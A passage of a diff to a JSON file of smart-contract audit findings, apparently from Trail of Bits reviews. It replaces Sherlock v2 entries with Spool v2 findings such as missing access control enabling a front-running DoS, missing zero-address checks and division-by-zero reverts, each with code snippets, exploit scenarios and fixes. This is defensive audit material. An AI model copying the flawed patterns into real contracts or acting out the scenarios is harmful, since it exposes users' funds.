optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6 . More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe . It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizationsor in the Emscripten transpilation to solc-js causes a security vulnerability in the Spool V2 contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", "labels": [ "Trail of Bits", "Severity: Undetermined", @@ -4572,49 +7250,49 @@ ] }, { - "title": "2. Certain functions lack zero address checks ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", - "body": "Certain functions fail to validate incoming arguments, so callers can accidentally set important state variables to the zero address. For example, the AaveV2Strategy contracts constructor function does not validate the aaveLmReceiver, which is the address that receives Aave rewards on calls to AaveV2Strategy.claimRewards. 39 40 41 42 43 44 45 46 47 } constructor(IAToken _aWant, address _aaveLmReceiver) { aWant = _aWant; // This gets the underlying token associated with aUSDC (USDC) want = IERC20(_aWant.UNDERLYING_ASSET_ADDRESS()); // Gets the specific rewards controller for this token type aaveIncentivesController = _aWant.getIncentivesController(); aaveLmReceiver = _aaveLmReceiver; Figure 2.1: managers/AaveV2Strategy.sol:39-47 If the aaveLmReceiver variable is set to the address zero, the Aave contract will revert with INVALID_TO_ADDRESS. This prevents any Aave rewards from being claimed for the designated token. The following functions are missing zero address checks: Manager.setSherlockCoreAddress AaveV2Strategy.sweep SherDistributionManager.sweep SherlockProtocolManager.sweep Sherlock.constructor Exploit Scenario Bob deploys AaveV2Strategy with aaveLmReceiver set to the zero address. All calls to claimRewards revert. Recommendations Short term, add zero address checks on all function arguments to ensure that users cannot accidentally set incorrect values. Long term, use Slither, which will catch functions that do not have zero address checks.", + "title": "2. Risk of SmartVaultFactory DoS due to lack of access controls on grantSmartVaultOwnership ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "Anyone can set the owner of the next smart vault to be created, which will result in a DoS of the SmartVaultFactory contract. The grantSmartVaultOwnership function in the SpoolAccessControl contract allows anyone to set the owner of a smart vault. This function reverts if an owner is already set for the provided smart vault. function grantSmartVaultOwnership( address smartVault, address owner) external { if (smartVaultOwner[smartVault] != address (0)) { revert SmartVaultOwnerAlreadySet(smartVault); } smartVaultOwner[smartVault] = owner; } Figure 2.1: The grantSmartVaultOwnership function in SpoolAccessControl.sol The SmartVaultFactory contract implements two functions for deploying new smart vaults: the deploySmartVault function uses the create opcode, and the deploySmartVaultDeterministically function uses the create2 opcode. Both functions create a new smart vault and call the grantSmartVaultOwnership function to make the message sender the owner of the newly created smart vault. Any user can pre-compute the address of the new smart vault for a deploySmartVault transaction by using the address and nonce of the SmartVaultFactory contract; to compute the address of the new smart vault for a deploySmartVaultDeterministically transaction, the user could front-run the transaction to capture the salt provided by the user who submitted it. Exploit Scenario Eve pre-computes the address of the new smart vault that will be created by the deploySmartVault function in the SmartVaultFactory contract. She then calls the grantSmartVaultOwnership function with the pre-computed address and a nonzero address as arguments. Now, every call to the deploySmartContract function reverts, making the SmartVaultFactory contract unusable. Using a similar strategy, Eve blocks the deploySmartVaultDeterministically function by front-running the user transaction to set the owner of the smart vault address computed using the user-provided salt. Recommendations Short term, add the onlyRole(ROLE_SMART_VAULT_INTEGRATOR, msg.sender) modier to the grantSmartVaultOwnership function to restrict access to it. Long term, follow the principle of least privilege by restricting access to the functions that grant specic privileges to actors of the system.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: High" + "Severity: High", + "Difficulty: Low" ] }, { - "title": "3. updateYieldStrategy could leave funds in the old strategy ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", - "body": "The updateYieldStrategy function sets a new yield strategy manager contract without calling yieldStrategy.withdrawAll() on the old strategy, potentially leaving funds in it. 257 // Sets a new yield strategy manager contract 258 /// @notice Update yield strategy 259 /// @param _yieldStrategy News address of the strategy 260 /// @dev try a yieldStrategyWithdrawAll() on old, ignore failure 261 function updateYieldStrategy(IStrategyManager _yieldStrategy) external override onlyOwner { 262 263 264 265 266 yieldStrategy = _yieldStrategy; 267 } if (address(_yieldStrategy) == address(0)) revert ZeroArgument(); if (yieldStrategy == _yieldStrategy) revert InvalidArgument(); emit YieldStrategyUpdated(yieldStrategy, _yieldStrategy); Figure 3.1: contracts/Sherlock.sol:257-267 Even though one could re-add the old strategy to recover the funds, this issue could cause stakers and the protocols insured by Sherlock to lose trust in the system. This issue has a signicant impact on the result of totalTokenBalanceStakers, which is used when calculating the shares in initialStake. totalTokenBalanceStakers uses the balance of the yield strategy. If the balance is missing the funds that should have been withdrawn from a previous strategy, the result will be incorrect. return 151 function totalTokenBalanceStakers() public view override returns (uint256) { 152 153 token.balanceOf(address(this)) + 154 155 sherlockProtocolManager.claimablePremiums(); 156 } yieldStrategy.balanceOf() + Figure 3.2: contracts/Sherlock.sol:151-156 uint256 _amount, uint256 _period, address _receiver 483 function initialStake( 484 485 486 487 ) external override whenNotPaused returns (uint256 _id, uint256 _sher) { ... 501 502 stakeShares_ = (_amount * totalStakeShares_) / (totalTokenBalanceStakers() - _amount); 503 // If this is the first stake ever, we just mint stake shares equal to the amount of USDC staked 504 else stakeShares_ = _amount; if (totalStakeShares_ != 0) Figure 3.3: contracts/Sherlock.sol:483-504 Exploit Scenario Bob, the owner of the Sherlock contract, calls updateYieldStrategy with a new strategy. Eve calls initialStake and receives more shares than she is due because totalTokenBalanceStakers returns a signicantly lower balance than it should. Bob notices the missing funds, calls updateYieldStrategy with the old strategy and then yieldStrategy.WithdrawAll to recover the funds, and switches back to the new strategy. Eves shares now have notably more value. Recommendations Short term, in updateYieldStrategy, add a call to yieldStrategy.withdrawAll() on the old strategy. Long term, when designing systems that store funds, use extensive unit testing and property-based testing to ensure that funds cannot become stuck.", + "title": "3. Lack of zero-value check on constructors and initializers ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "Several contracts constructors and initialization functions fail to validate incoming arguments. As a result, important state variables could be set to the zero address, which would result in the loss of assets. constructor ( ISpoolAccessControl accessControl_, IAssetGroupRegistry assetGroupRegistry_, IRiskManager riskManager_, IDepositManager depositManager_, IWithdrawalManager withdrawalManager_, IStrategyRegistry strategyRegistry_, IMasterWallet masterWallet_ , IUsdPriceFeedManager priceFeedManager_, address ghostStrategy ) SpoolAccessControllable(accessControl_) { _assetGroupRegistry = assetGroupRegistry_; _riskManager = riskManager_; _depositManager = depositManager_; _withdrawalManager = withdrawalManager_; _strategyRegistry = strategyRegistry_; _masterWallet = masterWallet_; _priceFeedManager = priceFeedManager_; _ghostStrategy = ghostStrategy; } Figure 3.1: The SmartVaultManager contracts constructor function in spool-v2-core/SmartVaultManager.sol#L111L130 These constructors include that of the SmartVaultManager contract, which sets the _masterWallet address (gure 3.1). SmartVaultManager contract is the entry point of the system and is used by users to deposit their tokens. User deposits are transferred to the _masterWallet address (gure 3.2). function _depositAssets (DepositBag calldata bag) internal returns ( uint256 ) { [...] for ( uint256 i ; i < deposits.length; ++i) { IERC20(tokens[i]).safeTransferFrom( msg.sender , address ( _masterWallet ), deposits[i]); } [...] } Figure 3.2: The _depositAssets function in spool-v2-core/SmartVaultManager.sol#L649L676 If _masterWallet is set to the zero address, the tokens will be transferred to the zero address and will be lost permanently. The constructors and initialization functions of the following contracts also fail to validate incoming arguments: StrategyRegistry DepositSwap SmartVault SmartVaultFactory SpoolAccessControllable DepositManager RiskManager SmartVaultManager WithdrawalManager RewardManager RewardPool Strategy Exploit Scenario Bob deploys the Spool system. During deployment, Bob accidentally sets the _masterWallet parameter of the SmartVaultManager contract to the zero address. Alice, excited about the new protocol, deposits 1 million WETH into it. Her deposited WETH tokens are transferred to the zero address, and Alice loses 1 million WETH. Recommendations Short term, add zero-value checks on all constructor arguments to ensure that the deployer cannot accidentally set incorrect values. Long term, use Slither , which will catch functions that do not have zero-value checks.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Medium", "Difficulty: High" ] }, { - "title": "4. Pausing and unpausing the system may not be possible when removing or replacing connected contracts ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", - "body": "The Sherlock contract allows all of the connected contracts to be paused or unpaused at the same time. However, if the sherDistributionManager contract is removed, or if any of the connected contracts are replaced when the system is paused, it might not be possible to pause or unpause the system. function removeSherDistributionManager() external override onlyOwner { if (address(sherDistributionManager) == address(0)) revert InvalidConditions(); emit SherDistributionManagerUpdated( sherDistributionManager, ISherDistributionManager(address(0)) ); delete sherDistributionManager; 206 207 208 209 210 211 212 213 214 } Figure 4.1: contracts/Sherlock.sol:206-214 Of all the connected contracts, the only one that can be removed is the sherDistributionManager contract. On the other hand, all of the connected contracts can be replaced through an update function. function pause() external onlyOwner { _pause(); yieldStrategy.pause(); sherDistributionManager.pause(); sherlockProtocolManager.pause(); sherlockClaimManager.pause(); 302 303 304 305 306 307 308 } 309 310 311 /// @notice Unpause external functions in all contracts function unpause() external onlyOwner { 312 313 314 315 316 317 } _unpause(); yieldStrategy.unpause(); sherDistributionManager.unpause(); sherlockProtocolManager.unpause(); sherlockClaimManager.unpause(); Figure 4.2: contracts/Sherlock.sol:302-317 If the sherDistributionManager contract is removed, a call to Sherlock.pause will revert, as it is attempting to call the zero address. If sherDistributionManager is removed while the system is paused, then a call to Sherlock.unpause will revert for the same reason. If any of the contracts is replaced while the system is paused, the replaced contract will be in an unpaused state while the other contracts are still paused. As a result, a call to Sherlock.unpause will revert, as it is attempting to unpause an already unpaused contract. Exploit Scenario Bob, the owner of the Sherlock contract, pauses the system to replace the sherlockProtocolManager contract, which contains a bug. Bob deploys a new sherlockProtocolManager contract and calls updateSherlockProtocolManager to set the new address in the Sherlock contract. To unpause the system, Bob calls Sherlock.unpause, which reverts because sherlockProtocolManager is already unpaused. Recommendations Short term, add conditional checks to the Sherlock.pause and Sherlock.unpause functions to check that a contract is either paused or unpaused, as expected, before attempting to update its state. For sherDistributionManager, the check should verify that the contract to be paused or unpaused is not the zero address. Long term, for pieces of code that depend on the states of multiple contracts, implement unit tests that cover each possible combination of contract states.", + "title": "4. Upgradeable contracts set state variables in the constructor ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The state variables set in the constructor of the RewardManager implementation contract are not visible in the proxy contract, making the RewardManager contract unusable. The same issue exists in the RewardPool and Strategy smart contracts. Upgradeable smart contracts using the delegatecall proxy pattern should implement an initializer function to set state variables in the proxy contract storage. The constructor function can be used to set immutable variables in the implementation contract because these variables do not consume storage slots and their values are inlined in the deployed code. The RewardManager contract is deployed as an upgradeable smart contract, but it sets the state variable _assetGroupRegistry in the constructor function. contract RewardManager is IRewardManager, RewardPool, ReentrancyGuard { ... /* ========== STATE VARIABLES ========== */ /// @notice Asset group registry IAssetGroupRegistry private _assetGroupRegistry; ... constructor ( ISpoolAccessControl spoolAccessControl, IAssetGroupRegistry assetGroupRegistry_, bool allowPoolRootUpdates ) RewardPool(spoolAccessControl, allowPoolRootUpdates) { _assetGroupRegistry = assetGroupRegistry_; } Figure 4.1: The constructor function in spool-v2-core/RewardManager.sol The value of the _assetGroupRegistry variable will not be visible in the proxy contract, and the admin will not be able to add reward tokens to smart vaults, making the RewardManager contract unusable. The following smart contracts are also aected by the same issue: 1. The ReentrancyGuard contract, which is non-upgradeable and is extended by RewardManager 2. The RewardPool contract, which sets the state variable allowUpdates in the constructor 3. The Strategy contract, which sets the state variable StrategyName in the constructor Exploit Scenario Bob creates a smart vault and wants to add a reward token to it. He calls the addToken function on the RewardManager contract, but the transaction unexpectedly reverts. Recommendations Short term, make the following changes: 1. Make _assetGroupRegistry an immutable variable in the RewardManager contract. 2. Extend the ReentrancyGuardUpgradeable contract in the RewardManager contract. 3. Make allowUpdates an immutable variable in the RewardPool contract. 4. Move the statement _strategyName = strategyName_; from the Strategy contracts constructor to the contracts __Strategy_init function. 5. Review all of the upgradeable contracts to ensure that they extend only upgradeable library contracts and that the inherited contracts have a __gap storage variable to prevent storage collision issues with future upgrades. Long term, review all of the upgradeable contracts to ensure that they use the initializer function instead of the constructor function to set state variables. Use slither-check-upgradeability to nd issues related to upgradeable smart contracts. 5. Insu\u0000cient validation of oracle price data Severity: Low Diculty: Medium Type: Data Validation Finding ID: TOB-SPL-5 Target: managers/UsdPriceFeedManager.sol", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: Medium" + "Severity: Medium", + "Difficulty: Low" ] }, { - "title": "5. SHER reward calculation uses confusing six-decimal SHER reward rate ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", - "body": "The reward calculation in calcReward uses a six-decimal SHER reward rate value. This might confuse readers and developers of the contracts because the SHER token has 18 decimals, and the calculated reward will also have 18 decimals. Also, this value does not allow the SHER reward rate to be set below 0.000001000000000000 SHER. function calcReward( 89 90 91 92 93 ) public view override returns (uint256 _sher) { uint256 _tvl, uint256 _amount, uint256 _period 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 [..] // If there are some max rewards available... if (maxRewardsAvailable != 0) { // And if the entire stake is still within the maxRewardsAvailable amount if (_amount <= maxRewardsAvailable) { // Then the entire stake amount should accrue max SHER rewards return (_amount * maxRewardsRate * _period) * DECIMALS; } else { // Otherwise, the stake takes all the maxRewardsAvailable left // We add the maxRewardsAvailable amount to the TVL (now _tvl _tvl += maxRewardsAvailable; // We subtract the amount of the stake that received max rewards _amount -= maxRewardsAvailable; // We accrue the max rewards available at the max rewards // This could be: $20M of maxRewardsAvailable which gets // Calculation continues after this _sher += (maxRewardsAvailable * maxRewardsRate * _period) * DECIMALS; } } // If there are SHER rewards still available if (slopeRewardsAvailable != 0) { _sher += (((zeroRewardsStartTVL - position) * _amount * maxRewardsRate * _period) / (zeroRewardsStartTVL - maxRewardsEndTVL)) * DECIMALS; 144 145 146 147 148 149 } } Figure 5.1: contracts/managers/SherDistributionManager.sol:89-149 In the reward calculation, the 6-decimal maxRewardsRate is rst multiplied by _amount and _period, resulting in a 12-decimal intermediate product. To output a nal 18-decimal product, this 12-decimal product is multiplied by DECIMALS to add 6 decimals. Although this leads to a correct result, it would be clearer to use an 18-decimal value for maxRewardsRate and to divide by DECIMALS at the end of the calculation. // using 6 decimal maxRewardsRate (10e6 * 1e6 * 10) * 1e6 = 100e18 = 100 SHER // using 18 decimal maxRewardsRate (10e6 * 1e18 * 10) / 1e6 = 100e18 = 100 SHER Figure 5.2: Comparison of a 6-decimal and an 18-decimal maxRewardsRate Exploit Scenario Bob, a developer of the Sherlock protocol, writes a new version of the SherDistributionManager contract that changes the reward calculation. He mistakenly assumes that the SHER maxRewardsRate has 18 decimals and updates the calculation incorrectly. As a result, the newly calculated reward is incorrect. Recommendations Short term, use an 18-decimal value for maxRewardsRate and divide by DECIMALS instead of multiplying. Long term, when implementing calculations that use the rate of a given token, strive to use a rate variable with the same number of decimals as the token. This will prevent any confusion with regard to decimals, which might lead to introducing precision bugs when updating the contracts.", + "title": "6. Incorrect handling of fromVaultsOnly in removeStrategy ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The removeStrategy function allows Spool admins to remove a strategy from the smart vaults using it. Admins are also able to remove the strategy from the StrategyRegistry contract, but only if the value of fromVaultsOnly is false ; however, the implementation enforces the opposite, as shown in gure 6.1. function removeStrategy( address strategy, bool fromVaultsOnly) external { _checkRole(ROLE_SPOOL_ADMIN, msg.sender ); _checkRole(ROLE_STRATEGY, strategy); ... if ( fromVaultsOnly ) { _strategyRegistry.removeStrategy(strategy); } } Figure 6.1: The removeStrategy function in spool-v2-core/SmartVaultManager.sol#L298L317 Exploit Scenario Bob, a Spool admin, calls removeStrategy with fromVaultsOnly set to true , believing that this call will not remove the strategy from the StrategyRegistry contract. However, once the transaction is executed, he discovers that the strategy was indeed removed. Recommendations Short term, replace if (fromVaultsOnly) with if (!fromVaultsOnly) in the removeStrategy function to implement the expected behavior. Long term, improve the systems unit and integration tests to catch issues such as this one.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: High" + "Severity: Low", + "Difficulty: Medium" ] }, { - "title": "6. A claim cannot be paid out or escalated if the protocol agent changes after the claim has been initialized ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", - "body": "The escalate and payoutClaim functions can be called only by the protocol agent that started the claim. Therefore, if the protocol agent role is reassigned after a claim is started, the new protocol agent will be unable to call these functions and complete the claim. function escalate(uint256 _claimID, uint256 _amount) external override nonReentrant whenNotPaused 388 389 390 391 392 393 { 394 395 396 397 398 399 400 401 402 403 if (_amount < BOND) revert InvalidArgument(); // Gets the internal ID of the claim bytes32 claimIdentifier = publicToInternalID[_claimID]; if (claimIdentifier == bytes32(0)) revert InvalidArgument(); // Retrieves the claim struct Claim storage claim = claims_[claimIdentifier]; // Requires the caller to be the protocol agent if (msg.sender != claim.initiator) revert InvalidSender(); Figure 6.1: contracts/managers/SherlockClaimManager.sol:388-403 Due to this scheme, care should be taken when updating the protocol agent. That is, the protocol agent should not be reassigned if there is an existing claim. However, if the protocol agent is changed when there is an existing claim, the protocol agent role could be transferred back to the original protocol agent to complete the claim. Exploit Scenario Alice is the protocol agent and starts a claim. Alice transfers the protocol agent role to Bob. The claim is approved by SPCC and can be paid out. Bob calls payoutClaim, but the transaction reverts. Recommendations Short term, update the comment in the escalate and payoutClaim functions to state that the caller needs to be the protocol agent that started the claim, and clearly describe this requirement in the protocol agent documentation. Alternatively, update the check to verify that msg.sender is the current protocol agent rather than specically the protocol agent who initiated the claim. Long term, review and document the eects of the reassignment of privileged roles on the systems state transitions. Such a review will help uncover cases in which the reassignment of privileged roles causes issues and possibly a denial of service to (part of) the system.", + "title": "7. Risk of LinearAllocationProvider and ExponentialAllocationProvider reverts due to division by zero ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The LinearAllocationProvider and ExponentialAllocationProvider contracts calculateAllocation function can revert due to a division-by-zero error: LinearAllocationProvider s function reverts when the sum of the strategies APY values is 0 , and ExponentialAllocationProvider s function reverts when a single strategy has an APY value of 0 . Figure 7.1 shows a snippet of the LinearAllocationProvider contracts calculateAllocation function; if the apySum variable, which is the sum of all the strategies APY values, is 0 , a division-by-zero error will occur. uint8 [] memory arrayRiskScores = data.riskScores; for ( uint8 i; i < data.apys.length; ++i) { apySum += (data.apys[i] > 0 ? uint256 (data.apys[i]) : 0); riskSum += arrayRiskScores[i]; } uint8 riskt = uint8 (data.riskTolerance + 10); // from 0 to 20 for ( uint8 i; i < data.apys.length; ++i) { uint256 apy = data.apys[i] > 0 ? uint256 (data.apys[i]) : 0; apy = (apy * FULL_PERCENT) / apySum ; Figure 7.1: Part of the calculateAllocation function in spool-v2-core/LinearAllocationProvider.sol#L39L49 Figure 7.2 shows that for the ExponentialAllocationProvider contracts calculateAllocation function, if the call to log_2 occurs with partApy set to 0 , the function will revert because of log_2 s require statement shown in gure 7.3. for ( uint8 i; i < data.apys.length; ++i) { uint256 uintApy = (data.apys[i] > 0 ? uint256 (data.apys[i]) : 0); int256 partRiskTolerance = fromUint( uint256 (riskArray[ uint8 (20 - riskt)])); partRiskTolerance = div(partRiskTolerance, _100); int256 partApy = fromUint(uintApy); partApy = div(partApy, _100); int256 apy = exp_2(mul(partRiskTolerance, log_2(partApy) )); Figure 7.2: Part of the calculateAllocation function in spool-v2-core/ExponentialAllocationProvider.sol#L323L331 function log_2( int256 x) internal pure returns ( int256 ) { unchecked { require (x > 0); Figure 7.3: Part of the log_2 function in spool-v2-core/ExponentialAllocationProvider.sol#L32L34 Exploit Scenario Bob deploys a smart vault with two strategies using the ExponentialAllocationProvider contract. At some point, one of the strategies has 0 APY, causing the transaction call to reallocate the assets to unexpectedly revert. Recommendations Short term, modify both versions of the calculateAllocation function so that they correctly handle cases in which a strategys APY is 0 . Long term, improve the systems unit and integration tests to ensure that the basic operations work as expected.", "labels": [ "Trail of Bits", "Severity: Medium", @@ -4622,39 +7300,29 @@ ] }, { - "title": "7. Missing input validation in setMinActiveBalance could cause a confusing event to be emitted ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", - "body": "The setMinActiveBalance functions input validation is incomplete: it should check that the minActiveBalance has not been set to its existing value, but this check is missing. Additionally, if the minActiveBalance is set to its existing value, the emitted MinBalance event will indicate that the old and new values are identical. This could confuse systems monitoring the contract that expect this event to be emitted only when the minActiveBalance changes. function setMinActiveBalance(uint256 _minActiveBalance) external override onlyOwner { // Can't set a value that is too high to be reasonable require(_minActiveBalance < MIN_BALANCE_SANITY_CEILING, 'INSANE'); emit MinBalance(minActiveBalance, _minActiveBalance); minActiveBalance = _minActiveBalance; 422 423 424 425 426 427 428 } Figure 7.1: contracts/managers/SherlockProtocolManager.sol:422-428 Exploit Scenario An o-chain monitoring system controlled by the Sherlock protocol is listening for events that indicate that a contract conguration value has changed. When such events are detected, the monitoring system sends an email to the admins of the Sherlock protocol. Alice, a contract owner, calls setMinActiveBalance with the existing minActiveBalance as input. The o-chain monitoring system detects the emitted event and noties the Sherlock protocol admins. The Sherlock protocol admins are confused since the value did not change. Recommendations Short term, add input validation that causes setMinActiveBalance to revert if the proposed minActiveBalance value equals the current value. Long term, document and test the expected behavior of all the systems events. Consider using a blockchain-monitoring system to track any suspicious behavior in the contracts.", - "labels": [ - "Trail of Bits", - "Severity: Informational", - "Difficulty: High" - ] - }, - { - "title": "8. payoutClaims calling of external contracts in a loop could cause a denial of service ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", - "body": "The payoutClaim function uses a loop to call the PreCorePayoutCallback function on a list of external contracts. If any of these calls reverts, the entire payoutClaim function reverts, and, hence, the transaction reverts. This may not be the desired behavior; if that is the case, a denial of service would prevent claims from being paid out. for (uint256 i; i < claimCallbacks.length; i++) { claimCallbacks[i].PreCorePayoutCallback(protocol, _claimID, amount); 499 500 501 } Figure 8.1: contracts/managers/SherlockClaimManager.sol:499-501 The owner of the SherlockClaimManager contract controls the list of contracts on which the PreCorePayoutCallback function is called. The owner can add or remove contracts from this list at any time. Therefore, if a contract is causing unexpected reverts, the owner can x the problem by (temporarily) removing that contract from the list. It might be expected that some of these calls revert and cause the entire transaction to revert. However, the external contracts that will be called and the expected behavior in the event of a revert are currently unknown. If a revert should not cause the entire transaction to revert, the current implementation does not fulll that requirement. To accommodate both casesa revert of an external call reverts the entire transaction or allows the transaction to continue a middle road can be taken. For each contract in the list, a boolean could indicate whether the transaction should revert or continue if the external call fails. If the boolean indicates that the transaction should continue, an emitted event would indicate the contract address and the input arguments of the callback that reverted. This would allow the system to continue functioning while admins investigate the cause of the revert and x the issue(s) if needed. Exploit Scenario Alice, the owner of the SherlockClaimManager contract, registers contract A in the list of contracts on which PreCorePayoutCallback is called. Contract A contains a bug that causes the callback to revert every time. Bob, a protocol agent, successfully les a claim and calls payoutClaim. The transaction reverts because the call to contract A reverts. Recommendations Short term, review the requirements of contracts that will be called by callback functions, and adjust the implementation to fulll those requirements. Long term, when designing a system reliant on external components that have not yet been determined, carefully consider whether to include those integrations during the development process or to wait until those components have been identied. This will prevent unforeseen problems due to incomplete or incorrect integrations with unknown contracts.", + "title": "8. Strategy APYs are never updated ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The _updateDhwYieldAndApy function is never called. As a result, each strategys APY will constantly be set to 0 . function _updateDhwYieldAndApy( address strategy, uint256 dhwIndex, int256 yieldPercentage) internal { if (dhwIndex > 1) { unchecked { _stateAtDhw[address(strategy)][dhwIndex - 1].timestamp); int256 timeDelta = int256 (block.timestamp - if (timeDelta > 0) { timeDelta; int256 normalizedApy = yieldPercentage * SECONDS_IN_YEAR_INT / int256 weight = _getRunningAverageApyWeight(timeDelta); _apys[strategy] = (_apys[strategy] * (FULL_PERCENT_INT - weight) + normalizedApy * weight) / FULL_PERCENT_INT; } } } } Figure 8.1: The _updateDhwYieldAndApy function in spool-v2-core/StrategyManager.sol#L298L317 A strategys APY is one of the parameters used by an allocator provider to decide where to allocate the assets of a smart vault. If a strategys APY is 0 , the LinearAllocationProvider and ExponentialAllocationProvider contracts will both revert when calculateAllocation is called due to a division-by-zero error. // set allocation if (uint16a16.unwrap(allocations) == 0) { _riskManager.setRiskProvider(smartVaultAddress, specification.riskProvider); _riskManager.setRiskTolerance(smartVaultAddress, specification.riskTolerance); _riskManager.setAllocationProvider(smartVaultAddress, specification.allocationProvider); allocations = _riskManager.calculateAllocation(smartVaultAddress, specification.strategies); } Figure 8.2: Part of the _integrateSmartVault function, which is called when a vault is created, in spool-v2-core/SmartVaultFactory.sol#L313L3 20 When a vault is created, the code in gure 8.2 is executed. For vaults whose strategyAllocation variable is set to 0 , which means the value will be calculated by the smart contract, and whose allocationProvide r variable is set to the LinearAllocationProvider or ExponentialAllocationProvider contract, the creation transaction will revert due to a division-by-zero error. Transactions for creating vaults with a nonzero strategyAllocation and with the same allocationProvider values mentioned above will succeed; however, the fund reallocation operation will revert because the _updateDhwYieldAndApy function is never called, causing the strategies APYs to be set to 0 , in turn causing the same division-by-zero error. Refer to nding TOB-SPL-7 , which is related to this issue; even if that nding is xed, incorrect results would still occur because of the missing _updateDhwYieldAndApy calls. Exploit Scenario Bob tries to deploy a smart vault with strategyAllocation set to 0 and allocationProvide r set to LinearAllocationProvider . The transaction unexpectedly fails. Recommendations Short term, add calls to _updateDhwYieldAndApy where appropriate. Long term, improve the systems unit and integration tests to ensure that the basic operations work as expected.", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: Medium" + "Severity: Medium", + "Difficulty: Low" ] }, { - "title": "9. pullReward could silently fail and cause stakers to lose all earned SHER rewards ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", - "body": "If the SherDistributionManager.pullReward function reverts, the calling function (_stake) will not set the SHER rewards in the stakers position NFT. As a result, the staker will not receive the payout of SHER rewards after the stake period has passed. // Sets the timestamp at which this position can first be unstaked/restaked lockupEnd_[_id] = block.timestamp + _period; if (address(sherDistributionManager) == address(0)) return 0; // Does not allow restaking of 0 tokens if (_amount == 0) return 0; // Checks this amount of SHER tokens in this contract before we transfer new ones uint256 before = sher.balanceOf(address(this)); // pullReward() calcs then actually transfers the SHER tokens to this contract try sherDistributionManager.pullReward(_amount, _period, _id, _receiver) returns ( function _stake( uint256 _amount, uint256 _period, uint256 _id, address _receiver 354 355 356 357 358 359 ) internal returns (uint256 _sher) { 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 } catch (bytes memory reason) { _sher = amount; uint256 amount ) { } // If for whatever reason the sherDistributionManager call fails emit SherRewardsError(reason); return 0; // actualAmount should represent the amount of SHER tokens transferred to this contract for the current stake position 382 383 384 385 386 } uint256 actualAmount = sher.balanceOf(address(this)) - before; if (actualAmount != _sher) revert InvalidSherAmount(_sher, actualAmount); // Assigns the newly created SHER tokens to the current stake position sherRewards_[_id] = _sher; Figure 9.1: contracts/Sherlock.sol:354-386 When the pullReward call reverts, the SherRewardsError event is emitted. The staker could check this event and see that no SHER rewards were set. The staker could also call the sherRewards function and provide the positions NFT ID to check whether the SHER rewards were set. However, stakers should not be expected to make these checks after every (re)stake. There are two ways in which the pullReward function can fail. First, a bug in the arithmetic could cause an overow and revert the function. Second, if the SherDistributionManager contract does not hold enough SHER to be able to transfer the calculated amount, the pullReward function will fail. The SHER balance of the contract needs to be manually topped up. If a staker detects that no SHER was set for her (re)stake, she may want to cancel the stake. However, stakers are not able to cancel a stake until the stakes period has passed (currently, at least three months). Exploit Scenario Alice creates a new stake, but the SherDistributionManager contract does not hold enough SHER to transfer the rewards, and the transaction reverts. The execution continues and sets Alices stake allocation to zero. Recommendations Short term, have the system revert transactions if pullReward reverts. Long term, have the system revert transactions if part of the expected rewards are not allocated due to an internal revert. This will prevent situations in which certain users get rewards while others do not.", + "title": "9. Incorrect bookkeeping of assets deposited into smart vaults ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "Assets deposited by users into smart vaults are incorrectly tracked. As a result, assets deposited into a smart vaults strategies when the flushSmartVault function is invoked correspond to the last deposit instead of the sum of all deposits into the strategies. When depositing assets into a smart vault, users can decide whether to invoke the flushSmartVault function. A smart vault ush is a synchronization process that makes deposited funds available to be deployed into the strategies and makes withdrawn funds available to be withdrawn from the strategies. However, the internal bookkeeping of deposits keeps track of only the last deposit of the current ush cycle instead of the sum of all deposits (gure 9.1). function depositAssets(DepositBag calldata bag, DepositExtras calldata bag2) external onlyRole(ROLE_SMART_VAULT_MANAGER, msg.sender ) returns ( uint256 [] memory , uint256 ) { ... // transfer tokens from user to master wallet for ( uint256 i; i < bag2.tokens.length; ++i) { _vaultDeposits[bag.smartVault][bag2.flushIndex][i] = bag.assets[i]; } ... Figure 9.1: A snippet of the depositAssets function in spool-v2-core/DepositManager.sol#L379L439 The _vaultDeposits variable is then used to calculate the asset distribution in the flushSmartVault function. function flushSmartVault( address smartVault, uint256 flushIndex, address [] calldata strategies, uint16a16 allocation, address [] calldata tokens ) external returns (uint16a16) { _checkRole(ROLE_SMART_VAULT_MANAGER, msg.sender ); if (_vaultDeposits[smartVault][flushIndex][0] == 0) { return uint16a16.wrap(0); } // handle deposits uint256 [] memory exchangeRates = 